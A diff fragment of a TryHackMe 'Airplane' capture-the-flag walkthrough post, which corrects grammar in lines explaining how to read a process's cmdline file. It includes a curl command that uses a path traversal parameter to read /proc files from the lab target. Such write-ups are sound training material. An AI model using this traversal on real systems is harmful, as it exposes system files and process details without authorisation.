ChristElise/christelise.github.io/_posts/2024-10-16-airplane-walkthrough.md

 :: Progress: [1000/1000] :: Job [1/1] :: 70 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
 ```

 We can see that we access three processes on the target.
-We can read the `cmdline` file to enumerate the command use to start these processes.
-This file contain the NULL cahracter `\x00` at its end so we need to replace it with any other character e.g space  to see it contents.
+We can read the `cmdline` file to enumerate the command used to start these processes.
+This file contains the NULL character `\x00` at its end so we need to replace it with any other character e.g. space to see its contents.
 ```bash
 ┌──(pentester㉿kali)-[~/…/TryHackMe/Challenge/Airplane/Misc File]
 └─$ curl -s 'http://airplane.thm:8000/?page=../../../../proc/538/cmdline' | sed 's/\x00/ /g'